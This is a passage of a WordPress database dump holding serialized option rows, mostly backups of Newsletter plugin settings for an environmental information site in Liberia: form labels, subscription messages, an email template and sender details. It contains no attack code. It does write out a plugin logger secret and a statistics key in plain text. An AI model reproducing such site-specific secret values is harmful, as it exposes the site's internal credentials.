reactivated.</p>\";s:6:\"notify\";s:0:\"\";s:12:\"notify_email\";s:0:\"\";}s:16:\"newsletter_users\";a:0:{}s:23:\"newsletter_users_search\";a:4:{s:11:\"search_text\";s:0:\"\";s:13:\"search_status\";s:0:\"\";s:11:\"search_list\";s:0:\"\";s:11:\"search_page\";i:0;}s:18:\"newsletter_version\";s:5:\"7.8.5\";}','no'),(3260382,'newsletter_backup_7.8.7','a:22:{s:19:\"newsletter_antispam\";a:6:{s:12:\"ip_blacklist\";a:0:{}s:17:\"address_blacklist\";a:0:{}s:9:\"antiflood\";s:2:\"30\";s:7:\"akismet\";s:1:\"0\";s:7:\"captcha\";s:1:\"1\";s:8:\"disabled\";s:1:\"0\";}s:23:\"newsletter_customfields\";a:121:{s:16:\"profile_1_status\";s:1:\"0\";s:9:\"profile_1\";s:0:\"\";s:14:\"profile_1_type\";s:4:\"text\";s:21:\"profile_1_placeholder\";s:0:\"\";s:15:\"profile_1_rules\";s:1:\"0\";s:17:\"profile_1_options\";s:0:\"\";s:16:\"profile_2_status\";s:1:\"0\";s:9:\"profile_2\";s:0:\"\";s:14:\"profile_2_type\";s:4:\"text\";s:21:\"profile_2_placeholder\";s:0:\"\";s:15:\"profile_2_rules\";s:1:\"0\";s:17:\"profile_2_options\";s:0:\"\";s:16:\"profile_3_status\";s:1:\"0\";s:9:\"profile_3\";s:0:\"\";s:14:\"profile_3_type\";s:4:\"text\";s:21:\"profile_3_placeholder\";s:0:\"\";s:15:\"profile_3_rules\";s:1:\"0\";s:17:\"profile_3_options\";s:0:\"\";s:16:\"profile_4_status\";s:1:\"0\";s:9:\"profile_4\";s:0:\"\";s:14:\"profile_4_type\";s:4:\"text\";s:21:\"profile_4_placeholder\";s:0:\"\";s:15:\"profile_4_rules\";s:1:\"0\";s:17:\"profile_4_options\";s:0:\"\";s:16:\"profile_5_status\";s:1:\"0\";s:9:\"profile_5\";s:0:\"\";s:14:\"profile_5_type\";s:4:\"text\";s:21:\"profile_5_placeholder\";s:0:\"\";s:15:\"profile_5_rules\";s:1:\"0\";s:17:\"profile_5_options\";s:0:\"\";s:16:\"profile_6_status\";s:1:\"0\";s:9:\"profile_6\";s:0:\"\";s:14:\"profile_6_type\";s:4:\"text\";s:21:\"profile_6_placeholder\";s:0:\"\";s:15:\"profile_6_rules\";s:1:\"0\";s:17:\"profile_6_options\";s:0:\"\";s:16:\"profile_7_status\";s:1:\"0\";s:9:\"profile_7\";s:0:\"\";s:14:\"profile_7_type\";s:4:\"text\";s:21:\"profile_7_placeholder\";s:0:\"\";s:15:\"profile_7_rules\";s:1:\"0\";s:17:\"profile_7_options\";s:0:\"\";s:16:\"profile_8_status\";s:1:\"0\";s:9:\"profile_8\";s:0:\"\";s:14:\"profile_8_type\";s:4:\"text\";s:21:\"profile_8_placeholder\";s:0:\"\";s:15:\"profile_8_rules\";s:1:\"0\";s:17:\"profile_8_options\";s:0:\"\";s:16:\"profile_9_status\";s:1:\"0\";s:9:\"profile_9\";s:0:\"\";s:14:\"profile_9_type\";s:4:\"text\";s:21:\"profile_9_placeholder\";s:0:\"\";s:15:\"profile_9_rules\";s:1:\"0\";s:17:\"profile_9_options\";s:0:\"\";s:17:\"profile_10_status\";s:1:\"0\";s:10:\"profile_10\";s:0:\"\";s:15:\"profile_10_type\";s:4:\"text\";s:22:\"profile_10_placeholder\";s:0:\"\";s:16:\"profile_10_rules\";s:1:\"0\";s:18:\"profile_10_options\";s:0:\"\";s:17:\"profile_11_status\";s:1:\"0\";s:10:\"profile_11\";s:0:\"\";s:15:\"profile_11_type\";s:4:\"text\";s:22:\"profile_11_placeholder\";s:0:\"\";s:16:\"profile_11_rules\";s:1:\"0\";s:18:\"profile_11_options\";s:0:\"\";s:17:\"profile_12_status\";s:1:\"0\";s:10:\"profile_12\";s:0:\"\";s:15:\"profile_12_type\";s:4:\"text\";s:22:\"profile_12_placeholder\";s:0:\"\";s:16:\"profile_12_rules\";s:1:\"0\";s:18:\"profile_12_options\";s:0:\"\";s:17:\"profile_13_status\";s:1:\"0\";s:10:\"profile_13\";s:0:\"\";s:15:\"profile_13_type\";s:4:\"text\";s:22:\"profile_13_placeholder\";s:0:\"\";s:16:\"profile_13_rules\";s:1:\"0\";s:18:\"profile_13_options\";s:0:\"\";s:17:\"profile_14_status\";s:1:\"0\";s:10:\"profile_14\";s:0:\"\";s:15:\"profile_14_type\";s:4:\"text\";s:22:\"profile_14_placeholder\";s:0:\"\";s:16:\"profile_14_rules\";s:1:\"0\";s:18:\"profile_14_options\";s:0:\"\";s:17:\"profile_15_status\";s:1:\"0\";s:10:\"profile_15\";s:0:\"\";s:15:\"profile_15_type\";s:4:\"text\";s:22:\"profile_15_placeholder\";s:0:\"\";s:16:\"profile_15_rules\";s:1:\"0\";s:18:\"profile_15_options\";s:0:\"\";s:17:\"profile_16_status\";s:1:\"0\";s:10:\"profile_16\";s:0:\"\";s:15:\"profile_16_type\";s:4:\"text\";s:22:\"profile_16_placeholder\";s:0:\"\";s:16:\"profile_16_rules\";s:1:\"0\";s:18:\"profile_16_options\";s:0:\"\";s:17:\"profile_17_status\";s:1:\"0\";s:10:\"profile_17\";s:0:\"\";s:15:\"profile_17_type\";s:4:\"text\";s:22:\"profile_17_placeholder\";s:0:\"\";s:16:\"profile_17_rules\";s:1:\"0\";s:18:\"profile_17_options\";s:0:\"\";s:17:\"profile_18_status\";s:1:\"0\";s:10:\"profile_18\";s:0:\"\";s:15:\"profile_18_type\";s:4:\"text\";s:22:\"profile_18_placeholder\";s:0:\"\";s:16:\"profile_18_rules\";s:1:\"0\";s:18:\"profile_18_options\";s:0:\"\";s:17:\"profile_19_status\";s:1:\"0\";s:10:\"profile_19\";s:0:\"\";s:15:\"profile_19_type\";s:4:\"text\";s:22:\"profile_19_placeholder\";s:0:\"\";s:16:\"profile_19_rules\";s:1:\"0\";s:18:\"profile_19_options\";s:0:\"\";s:17:\"profile_20_status\";s:1:\"0\";s:10:\"profile_20\";s:0:\"\";s:15:\"profile_20_type\";s:4:\"text\";s:22:\"profile_20_placeholder\";s:0:\"\";s:16:\"profile_20_rules\";s:1:\"0\";s:18:\"profile_20_options\";s:0:\"\";s:13:\"profile_error\";s:34:\"A mandatory field is not filled in\";}s:20:\"newsletter_dismissed\";a:1:{s:20:\"newsletter-shortcode\";i:1;}s:17:\"newsletter_emails\";a:1:{s:5:\"theme\";s:7:\"default\";}s:31:\"newsletter_emails_theme_default\";a:0:{}s:15:\"newsletter_form\";a:68:{s:5:\"email\";s:5:\"Email\";s:11:\"email_error\";s:28:\"Email address is not correct\";s:4:\"name\";s:23:\"First name or full name\";s:11:\"name_status\";i:2;s:10:\"name_rules\";s:1:\"0\";s:7:\"surname\";s:9:\"Last name\";s:14:\"surname_status\";s:1:\"0\";s:10:\"sex_status\";s:1:\"0\";s:3:\"sex\";s:3:\"I\'m\";s:7:\"privacy\";s:52:\"By continuing, you accept the cookies privacy policy\";s:14:\"privacy_status\";i:1;s:11:\"privacy_url\";s:48:\"https://ekmsliberia.info/cookies-privacy-policy/\";s:18:\"privacy_use_wp_url\";i:0;s:9:\"subscribe\";s:12:\"Get Updates!\";s:12:\"title_female\";s:3:\"Ms.\";s:10:\"title_male\";s:3:\"Mr.\";s:10:\"title_none\";s:4:\"Dear\";s:8:\"sex_male\";s:3:\"Man\";s:10:\"sex_female\";s:5:\"Woman\";s:8:\"sex_none\";s:13:\"Not specified\";s:10:\"name_error\";s:16:\"Name is required\";s:13:\"surname_rules\";s:1:\"0\";s:13:\"surname_error\";s:21:\"Last name is required\";s:9:\"sex_rules\";s:1:\"0\";s:13:\"privacy_error\";s:42:\"You must accept the cookies privacy policy\";s:13:\"list_1_forced\";i:0;s:13:\"list_2_forced\";i:0;s:13:\"list_3_forced\";i:0;s:13:\"list_4_forced\";i:0;s:13:\"list_5_forced\";i:0;s:13:\"list_6_forced\";i:0;s:13:\"list_7_forced\";i:0;s:13:\"list_8_forced\";i:0;s:13:\"list_9_forced\";i:0;s:14:\"list_10_forced\";i:0;s:14:\"list_11_forced\";i:0;s:14:\"list_12_forced\";i:0;s:14:\"list_13_forced\";i:0;s:14:\"list_14_forced\";i:0;s:14:\"list_15_forced\";i:0;s:14:\"list_16_forced\";i:0;s:14:\"list_17_forced\";i:0;s:14:\"list_18_forced\";i:0;s:14:\"list_19_forced\";i:0;s:14:\"list_20_forced\";i:0;s:14:\"list_21_forced\";i:0;s:14:\"list_22_forced\";i:0;s:14:\"list_23_forced\";i:0;s:14:\"list_24_forced\";i:0;s:14:\"list_25_forced\";i:0;s:14:\"list_26_forced\";i:0;s:14:\"list_27_forced\";i:0;s:14:\"list_28_forced\";i:0;s:14:\"list_29_forced\";i:0;s:14:\"list_30_forced\";i:0;s:14:\"list_31_forced\";i:0;s:14:\"list_32_forced\";i:0;s:14:\"list_33_forced\";i:0;s:14:\"list_34_forced\";i:0;s:14:\"list_35_forced\";i:0;s:14:\"list_36_forced\";i:0;s:14:\"list_37_forced\";i:0;s:14:\"list_38_forced\";i:0;s:14:\"list_39_forced\";i:0;s:14:\"list_40_forced\";i:0;s:12:\"customfields\";a:0:{}s:5:\"lists\";a:0:{}s:13:\"lists_checked\";a:0:{}}s:15:\"newsletter_info\";a:18:{s:11:\"header_logo\";a:2:{s:2:\"id\";s:3:\"440\";s:3:\"url\";s:60:\"https://ekmsliberia.info/wp-content/uploads/2019/11/seal.png\";}s:12:\"header_title\";s:41:\"Environmental Knowledge Management System\";s:10:\"header_sub\";s:19:\"Republic of Liberia\";s:12:\"footer_title\";s:12:\"EKMS Liberia\";s:14:\"footer_contact\";s:37:\"4th Street, Sinkor, Monrovia, Liberia\";s:12:\"footer_legal\";s:0:\"\";s:12:\"facebook_url\";s:85:\"https://web.facebook.com/pg/Environmental-Knowledge-Management-System-108459580598172\";s:11:\"twitter_url\";s:31:\"https://twitter.com/ekmsliberia\";s:13:\"instagram_url\";s:0:\"\";s:13:\"pinterest_url\";s:0:\"\";s:12:\"linkedin_url\";s:0:\"\";s:10:\"tumblr_url\";s:0:\"\";s:11:\"youtube_url\";s:0:\"\";s:9:\"vimeo_url\";s:0:\"\";s:14:\"soundcloud_url\";s:0:\"\";s:12:\"telegram_url\";s:0:\"\";s:6:\"vk_url\";s:0:\"\";s:14:\"googleplus_url\";s:0:\"\";}s:23:\"newsletter_install_time\";s:10:\"1575385711\";s:16:\"newsletter_lists\";a:120:{s:6:\"list_1\";s:0:\"\";s:13:\"list_1_status\";i:0;s:13:\"list_1_forced\";i:0;s:6:\"list_2\";s:0:\"\";s:13:\"list_2_status\";i:0;s:13:\"list_2_forced\";i:0;s:6:\"list_3\";s:0:\"\";s:13:\"list_3_status\";i:0;s:13:\"list_3_forced\";i:0;s:6:\"list_4\";s:0:\"\";s:13:\"list_4_status\";i:0;s:13:\"list_4_forced\";i:0;s:6:\"list_5\";s:0:\"\";s:13:\"list_5_status\";i:0;s:13:\"list_5_forced\";i:0;s:6:\"list_6\";s:0:\"\";s:13:\"list_6_status\";i:0;s:13:\"list_6_forced\";i:0;s:6:\"list_7\";s:0:\"\";s:13:\"list_7_status\";i:0;s:13:\"list_7_forced\";i:0;s:6:\"list_8\";s:0:\"\";s:13:\"list_8_status\";i:0;s:13:\"list_8_forced\";i:0;s:6:\"list_9\";s:0:\"\";s:13:\"list_9_status\";i:0;s:13:\"list_9_forced\";i:0;s:7:\"list_10\";s:0:\"\";s:14:\"list_10_status\";i:0;s:14:\"list_10_forced\";i:0;s:7:\"list_11\";s:0:\"\";s:14:\"list_11_status\";i:0;s:14:\"list_11_forced\";i:0;s:7:\"list_12\";s:0:\"\";s:14:\"list_12_status\";i:0;s:14:\"list_12_forced\";i:0;s:7:\"list_13\";s:0:\"\";s:14:\"list_13_status\";i:0;s:14:\"list_13_forced\";i:0;s:7:\"list_14\";s:0:\"\";s:14:\"list_14_status\";i:0;s:14:\"list_14_forced\";i:0;s:7:\"list_15\";s:0:\"\";s:14:\"list_15_status\";i:0;s:14:\"list_15_forced\";i:0;s:7:\"list_16\";s:0:\"\";s:14:\"list_16_status\";i:0;s:14:\"list_16_forced\";i:0;s:7:\"list_17\";s:0:\"\";s:14:\"list_17_status\";i:0;s:14:\"list_17_forced\";i:0;s:7:\"list_18\";s:0:\"\";s:14:\"list_18_status\";i:0;s:14:\"list_18_forced\";i:0;s:7:\"list_19\";s:0:\"\";s:14:\"list_19_status\";i:0;s:14:\"list_19_forced\";i:0;s:7:\"list_20\";s:0:\"\";s:14:\"list_20_status\";i:0;s:14:\"list_20_forced\";i:0;s:7:\"list_21\";s:0:\"\";s:14:\"list_21_status\";i:0;s:14:\"list_21_forced\";i:0;s:7:\"list_22\";s:0:\"\";s:14:\"list_22_status\";i:0;s:14:\"list_22_forced\";i:0;s:7:\"list_23\";s:0:\"\";s:14:\"list_23_status\";i:0;s:14:\"list_23_forced\";i:0;s:7:\"list_24\";s:0:\"\";s:14:\"list_24_status\";i:0;s:14:\"list_24_forced\";i:0;s:7:\"list_25\";s:0:\"\";s:14:\"list_25_status\";i:0;s:14:\"list_25_forced\";i:0;s:7:\"list_26\";s:0:\"\";s:14:\"list_26_status\";i:0;s:14:\"list_26_forced\";i:0;s:7:\"list_27\";s:0:\"\";s:14:\"list_27_status\";i:0;s:14:\"list_27_forced\";i:0;s:7:\"list_28\";s:0:\"\";s:14:\"list_28_status\";i:0;s:14:\"list_28_forced\";i:0;s:7:\"list_29\";s:0:\"\";s:14:\"list_29_status\";i:0;s:14:\"list_29_forced\";i:0;s:7:\"list_30\";s:0:\"\";s:14:\"list_30_status\";i:0;s:14:\"list_30_forced\";i:0;s:7:\"list_31\";s:0:\"\";s:14:\"list_31_status\";i:0;s:14:\"list_31_forced\";i:0;s:7:\"list_32\";s:0:\"\";s:14:\"list_32_status\";i:0;s:14:\"list_32_forced\";i:0;s:7:\"list_33\";s:0:\"\";s:14:\"list_33_status\";i:0;s:14:\"list_33_forced\";i:0;s:7:\"list_34\";s:0:\"\";s:14:\"list_34_status\";i:0;s:14:\"list_34_forced\";i:0;s:7:\"list_35\";s:0:\"\";s:14:\"list_35_status\";i:0;s:14:\"list_35_forced\";i:0;s:7:\"list_36\";s:0:\"\";s:14:\"list_36_status\";i:0;s:14:\"list_36_forced\";i:0;s:7:\"list_37\";s:0:\"\";s:14:\"list_37_status\";i:0;s:14:\"list_37_forced\";i:0;s:7:\"list_38\";s:0:\"\";s:14:\"list_38_status\";i:0;s:14:\"list_38_forced\";i:0;s:7:\"list_39\";s:0:\"\";s:14:\"list_39_status\";i:0;s:14:\"list_39_forced\";i:0;s:7:\"list_40\";s:0:\"\";s:14:\"list_40_status\";i:0;s:14:\"list_40_forced\";i:0;}s:20:\"newsletter_log_level\";s:1:\"0\";s:24:\"newsletter_logger_secret\";s:8:\"dc01b950\";s:15:\"newsletter_main\";a:37:{s:11:\"return_path\";b:0;s:8:\"reply_to\";b:0;s:12:\"sender_email\";s:24:\"contact@ekmsliberia.info\";s:11:\"sender_name\";s:23:\"Liberia EKMS Newsletter\";s:6:\"editor\";i:0;s:13:\"scheduler_max\";s:5:\"10000\";s:9:\"phpmailer\";i:0;s:5:\"debug\";s:1:\"0\";s:5:\"track\";s:1:\"1\";s:3:\"css\";s:0:\"\";s:12:\"css_disabled\";s:1:\"0\";s:2:\"ip\";s:0:\"\";s:4:\"page\";s:4:\"2904\";s:19:\"disable_cron_notice\";i:0;s:13:\"do_shortcodes\";s:1:\"0\";s:11:\"header_logo\";a:2:{s:2:\"id\";s:3:\"440\";s:3:\"url\";s:60:\"https://ekmsliberia.info/wp-content/uploads/2019/11/seal.png\";}s:12:\"header_title\";s:41:\"Environmental Knowledge Management System\";s:10:\"header_sub\";s:19:\"Republic of Liberia\";s:12:\"footer_title\";s:12:\"EKMS Liberia\";s:14:\"footer_contact\";s:37:\"4th Street, Sinkor, Monrovia, Liberia\";s:12:\"footer_legal\";s:0:\"\";s:12:\"facebook_url\";s:85:\"https://web.facebook.com/pg/Environmental-Knowledge-Management-System-108459580598172\";s:11:\"twitter_url\";s:31:\"https://twitter.com/ekmsliberia\";s:13:\"instagram_url\";s:0:\"\";s:13:\"pinterest_url\";s:0:\"\";s:12:\"linkedin_url\";s:0:\"\";s:10:\"tumblr_url\";s:0:\"\";s:11:\"youtube_url\";s:0:\"\";s:9:\"vimeo_url\";s:0:\"\";s:14:\"soundcloud_url\";s:0:\"\";s:12:\"telegram_url\";s:0:\"\";s:6:\"vk_url\";s:0:\"\";s:14:\"googleplus_url\";s:0:\"\";s:12:\"contract_key\";s:0:\"\";s:9:\"log_level\";s:1:\"0\";s:25:\"content_transfer_encoding\";s:0:\"\";s:5:\"roles\";a:0:{}}s:15:\"newsletter_page\";s:4:\"2904\";s:18:\"newsletter_profile\";a:10:{s:4:\"text\";s:188:\"{profile_form}\n    <p>If you change your email address, a confirmation email will be sent to activate it.</p>\n    <p><a href=\"{unsubscription_confirm_url}\">Cancel your subscription</a></p>\";s:13:\"email_changed\";s:81:\"Your email has been changed, an activation email has been sent with instructions.\";s:5:\"error\";s:42:\"Your email is not valid or already in use.\";s:10:\"save_label\";s:4:\"Save\";s:13:\"privacy_label\";s:21:\"Read our privacy note\";s:5:\"saved\";s:14:\"Profile saved.\";s:18:\"export_newsletters\";i:0;s:3:\"url\";s:0:\"\";s:5:\"lists\";a:0:{}s:12:\"customfields\";a:0:{}}s:21:\"newsletter_statistics\";a:1:{s:3:\"key\";s:32:\"3e00f6b7ad514de0ee66dbc9f56651eb\";}s:23:\"newsletter_subscription\";a:18:{s:14:\"noconfirmation\";s:1:\"1\";s:12:\"notify_email\";s:24:\"contact@ekmsliberia.info\";s:8:\"multiple\";s:1:\"0\";s:6:\"notify\";s:1:\"0\";s:10:\"error_text\";s:102:\"<p>You cannot subscribe with the email address you entered, please contact the site administrator.</p>\";s:17:\"subscription_text\";s:26:\"<p>{subscription_form}</p>\";s:17:\"confirmation_text\";s:104:\"<p>A confirmation email is on the way. Follow the instructions and check the spam folder. Thank you.</p>\";s:20:\"confirmation_subject\";s:32:\"Please confirm your subscription\";s:21:\"confirmation_tracking\";s:0:\"\";s:20:\"confirmation_message\";s:94:\"<p>Please confirm your subscription <a href=\"{subscription_confirm_url}\">clicking here</a></p>\";s:14:\"confirmed_text\";s:43:\"<p>Your subscription has been confirmed</p>\";s:17:\"confirmed_subject\";s:7:\"Welcome\";s:17:\"confirmed_message\";s:140:\"<p>This message confirms your subscription to our newsletter. Thank you!</p>\r\n<hr />\r\n<p><a href=\"{profile_url}\">Change your profile</a></p>\";s:18:\"confirmed_tracking\";s:0:\"\";s:14:\"optin_override\";s:1:\"0\";s:16:\"confirmation_url\";s:0:\"\";s:13:\"confirmed_url\";s:0:\"\";s:18:\"confirmed_disabled\";s:1:\"0\";}s:17:\"newsletter_system\";a:0:{}s:19:\"newsletter_template\";a:1:{s:8:\"template\";s:2365:\"<!DOCTYPE html>\n<html>\n    <head>\n        <!-- General styles, not used by all email clients -->\n        <style type=\"text/css\" media=\"all\">\n            a {\n                text-decoration: none;\n                color: #0088cc;\n            }\n            hr {\n                border-top: 1px solid #999;\n            }\n        </style>\n    </head>\n\n    <!-- KEEP THE LAYOUT SIMPLE: THOSE ARE SERVICE MESSAGES. -->\n    <body style=\"margin: 0; padding: 0;\">\n\n        <!-- Top title with dark background -->\n        <table style=\"background-color: #444; width: 100%;\" cellspacing=\"0\" cellpadding=\"0\">\n            <tr>\n                <td style=\"padding: 20px; text-align: center; font-family: sans-serif; color: #fff; font-size: 28px\">\n                    {blog_title}\n                </td>\n            </tr>\n        </table>\n\n        <!-- Main table 100% wide with background color #eee -->    \n        <table style=\"background-color: #eee; width: 100%;\">\n            <tr>\n                <td align=\"center\" style=\"padding: 15px;\">\n\n                    <!-- Content table with backgdound color #fff, width 500px -->\n                    <table style=\"background-color: #fff; max-width: 600px; width: 100%; border: 1px solid #ddd;\">\n                        <tr>\n                            <td style=\"padding: 15px; color: #333; font-size: 16px; font-family: sans-serif\">\n                                <!-- The \"message\" tag below is replaced with one of confirmation, welcome or goodbye messages -->\n                                <!-- Messages content can be configured on Newsletter List Building panels --> \n\n                                {message}\n\n                                <hr>\n                                <!-- Signature if not already added to single messages (surround with <p>) -->\n                                <p>\n                                    <small>\n                                        <a href=\"{blog_url}\">{blog_url}</a><br>\n                                        {company_name}<br>\n                                        {company_address}\n                                    </small>\n                                </p>\n                                \n\n                            </td>\n                        </tr>\n                    </table>\n\n                </td>\n            </tr>\n        </table>\n\n    </body>\n</html>\";}s:25:\"newsletter_unsubscription\";a:8:{s:16:\"unsubscribe_text\";s:103:\"<p>Please confirm you want to unsubscribe <a href=\"{unsubscription_confirm_url}\">clicking here</a>.</p>\";s:10:\"error_text\";s:99:\"<p>Subscriber not found, it probably has already been removed. No further actions are required.</p>\";s:17:\"unsubscribed_text\";s:124:\"<p>Your subscription has been deleted. If that was an error you can <a href=\"{reactivate_url}\">subscribe again here</a>.</p>\";s:20:\"unsubscribed_subject\";s:7:\"Goodbye\";s:20:\"unsubscribed_message\";s:87:\"<p>This message confirms that you have unsubscribed from our newsletter. Thank you.</p>\";s:16:\"reactivated_text\";s:46:\"<p>Your subscription has been reactivated.</p>\";s:6:\"notify\";s:0:\"\";s:12:\"notify_email\";s:0:\"\";}s:16:\"newsletter_users\";a:0:{}s:23:\"newsletter_users_search\";a:4:{s:11:\"search_text\";s:0:\"\";s:13:\"search_status\";s:0:\"\";s:11:\"search_list\";s:0:\"\";s:11:\"search_page\";i:0;}s:18:\"newsletter_version\";s:5:\"7.8.7\";}','no'),(3544848,'everest_forms_load_fonts_locally','no','yes'),(3544849,'everest_forms_version','2.0.6','yes'),(3544850,'everest_forms_db_version','2.0.6','yes'),(3545024,'post_views_counter_settings_other','a:3:{s:13:\"menu_position\";s:3:\"top\";s:19:\"deactivation_delete\";b:0;s:7:\"license\";s:0:\"\";}','no'),(3545072,'newsletter_backup_7.8.8','a:22:{s:19:\"newsletter_antispam\";a:6:{s:12:\"ip_blacklist\";a:0:{}s:17:\"address_blacklist\";a:0:{}s:9:\"antiflood\";s:2:\"30\";s:7:\"akismet\";s:1:\"0\";s:7:\"captcha\";s:1:\"1\";s:8:\"disabled\";s:1:\"0\";}s:23:\"newsletter_customfields\";a:121:{s:16:\"profile_1_status\";s:1:\"0\";s:9:\"profile_1\";s:0:\"\";s:14:\"profile_1_type\";s:4:\"text\";s:21:\"profile_1_placeholder\";s:0:\"\";s:15:\"profile_1_rules\";s:1:\"0\";s:17:\"profile_1_options\";s:0:\"\";s:16:\"profile_2_status\";s:1:\"0\";s:9:\"profile_2\";s:0:\"\";s:14:\"profile_2_type\";s:4:\"text\";s:21:\"profile_2_placeholder\";s:0:\"\";s:15:\"profile_2_rules\";s:1:\"0\";s:17:\"profile_2_options\";s:0:\"\";s:16:\"profile_3_status\";s:1:\"0\";s:9:\"profile_3\";s:0:\"\";s:14:\"profile_3_type\";s:4:\"text\";s:21:\"profile_3_placeholder\";s:0:\"\";s:15:\"profile_3_rules\";s:1:\"0\";s:17:\"profile_3_options\";s:0:\"\";s:16:\"profile_4_status\";s:1:\"0\";s:9:\"profile_4\";s:0:\"\";s:14:\"profile_4_type\";s:4:\"text\";s:21:\"profile_4_placeholder\";s:0:\"\";s:15:\"profile_4_rules\";s:1:\"0\";s:17:\"profile_4_options\";s:0:\"\";s:16:\"profile_5_status\";s:1:\"0\";s:9:\"profile_5\";s:0:\"\";s:14:\"profile_5_type\";s:4:\"text\";s:21:\"profile_5_placeholder\";s:0:\"\";s:15:\"profile_5_rules\";s:1:\"0\";s:17:\"profile_5_options\";s:0:\"\";s:16:\"profile_6_status\";s:1:\"0\";s:9:\"profile_6\";s:0:\"\";s:14:\"profile_6_type\";s:4:\"text\";s:21:\"profile_6_placeholder\";s:0:\"\";s:15:\"profile_6_rules\";s:1:\"0\";s:17:\"profile_6_options\";s:0:\"\";s:16:\"profile_7_status\";s:1:\"0\";s:9:\"profile_7\";s:0:\"\";s:14:\"profile_7_type\";s:4:\"text\";s:21:\"profile_7_placeholder\";s:0:\"\";s:15:\"profile_7_rules\";s:1:\"0\";s:17:\"profile_7_options\";s:0:\"\";s:16:\"profile_8_status\";s:1:\"0\";s:9:\"profile_8\";s:0:\"\";s:14:\"profile_8_type\";s:4:\"text\";s:21:\"profile_8_placeholder\";s:0:\"\";s:15:\"profile_8_rules\";s:1:\"0\";s:17:\"profile_8_options\";s:0:\"\";s:16:\"profile_9_status\";s:1:\"0\";s:9:\"profile_9\";s:0:\"\";s:14:\"profile_9_type\";s:4:\"text\";s:21:\"profile_9_placeholder\";s:0:\"\";s:15:\"profile_9_rules\";s:1:\"0\";s:17:\"profile_9_options\";s:0:\"\";s:17:\"profile_10_status\";s:1:\"0\";s:10:\"profile_10\";s:0:\"\";s:15:\"profile_10_type\";s:4:\"text\";s:22:\"profile_10_placeholder\";s:0:\"\";s:16:\"profile_10_rules\";s:1:\"0\";s:18:\"profile_10_options\";s:0:\"\";s:17:\"profile_11_status\";s:1:\"0\";s:10:\"profile_11\";s:0:\"\";s:15:\"profile_11_type\";s:4:\"text\";s:22:\"profile_11_placeholder\";s:0:\"\";s:16:\"profile_11_rules\";s:1:\"0\";s:18:\"profile_11_options\";s:0:\"\";s:17:\"profile_12_status\";s:1:\"0\";s:10:\"profile_12\";s:0:\"\";s:15:\"profile_12_type\";s:4:\"text\";s:22:\"profile_12_placeholder\";s:0:\"\";s:16:\"profile_12_rules\";s:1:\"0\";s:18:\"profile_12_options\";s:0:\"\";s:17:\"profile_13_status\";s:1:\"0\";s:10:\"profile_13\";s:0:\"\";s:15:\"profile_13_type\";s:4:\"text\";s:22:\"profile_13_placeholder\";s:0:\"\";s:16:\"profile_13_rules\";s:1:\"0\";s:18:\"profile_13_options\";s:0:\"\";s:17:\"profile_14_status\";s:1:\"0\";s:10:\"profile_14\";s:0:\"\";s:15:\"profile_14_type\";s:4:\"text\";s:22:\"profile_14_placeholder\";s:0:\"\";s:16:\"profile_14_rules\";s:1:\"0\";s:18:\"profile_14_options\";s:0:\"\";s:17:\"profile_15_status\";s:1:\"0\";s:10:\"profile_15\";s:0:\"\";s:15:\"profile_15_type\";s:4:\"text\";s:22:\"profile_15_placeholder\";s:0:\"\";s:16:\"profile_15_rules\";s:1:\"0\";s:18:\"profile_15_options\";s:0:\"\";s:17:\"profile_16_status\";s:1:\"0\";s:10:\"profile_16\";s:0:\"\";s:15:\"profile_16_type\";s:4:\"text\";s:22:\"profile_16_placeholder\";s:0:\"\";s:16:\"profile_16_rules\";s:1:\"0\";s:18:\"profile_16_options\";s:0:\"\";s:17:\"profile_17_status\";s:1:\"0\";s:10:\"profile_17\";s:0:\"\";s:15:\"profile_17_type\";s:4:\"text\";s:22:\"profile_17_placeholder\";s:0:\"\";s:16:\"profile_17_rules\";s:1:\"0\";s:18:\"profile_17_options\";s:0:\"\";s:17:\"profile_18_status\";s:1:\"0\";s:10:\"profile_18\";s:0:\"\";s:15:\"profile_18_type\";s:4:\"text\";s:22:\"profile_18_placeholder\";s:0:\"\";s:16:\"profile_18_rules\";s:1:\"0\";s:18:\"profile_18_options\";s:0:\"\";s:17:\"profile_19_status\";s:1:\"0\";s:10:\"profile_19\";s:0:\"\";s:15:\"profile_19_type\";s:4:\"text\";s:22:\"profile_19_placeholder\";s:0:\"\";s:16:\"profile_19_rules\";s:1:\"0\";s:18:\"profile_19_options\";s:0:\"\";s:17:\"profile_20_status\";s:1:\"0\";s:10:\"profile_20\";s:0:\"\";s:15:\"profile_20_type\";s:4:\"text\";s:22:\"profile_20_placeholder\";s:0:\"\";s:16:\"profile_20_rules\";s:1:\"0\";s:18:\"profile_20_options\";s:0:\"\";s:13:\"profile_error\";s:34:\"A mandatory field is not filled in\";}s:20:\"newsletter_dismissed\";a:1:{s:20:\"newsletter-shortcode\";i:1;}s:17:\"newsletter_emails\";a:1:{s:5:\"theme\";s:7:\"default\";}s:31:\"newsletter_emails_theme_default\";a:0:{}s:15:\"newsletter_form\";a:68:{s:5:\"email\";s:5:\"Email\";s:11:\"email_error\";s:28:\"Email address is not correct\";s:4:\"name\";s:23:\"First name or full name\";s:11:\"name_status\";i:2;s:10:\"name_rules\";s:1:\"0\";s:7:\"surname\";s:9:\"Last name\";s:14:\"surname_status\";s:1:\"0\";s:10:\"sex_status\";s:1:\"0\";s:3:\"sex\";s:3:\"I\'m\";s:7:\"privacy\";s:52:\"By continuing, you accept the cookies privacy policy\";s:14:\"privacy_status\";i:1;s:11:\"privacy_url\";s:48:\"https://ekmsliberia.info/cookies-privacy-policy/\";s:18:\"privacy_use_wp_url\";i:0;s:9:\"subscribe\";s:12:\"Get Updates!\";s:12:\"title_female\";s:3:\"Ms.\";s:10:\"title_male\";s:3:\"Mr.\";s:10:\"title_none\";s:4:\"Dear\";s:8:\"sex_male\";s:3:\"Man\";s:10:\"sex_female\";s:5:\"Woman\";s:8:\"sex_none\";s:13:\"Not specified\";s:10:\"name_error\";s:16:\"Name is required\";s:13:\"surname_rules\";s:1:\"0\";s:13:\"surname_error\";s:21:\"Last name is required\";s:9:\"sex_rules\";s:1:\"0\";s:13:\"privacy_error\";s:42:\"You must accept the cookies privacy 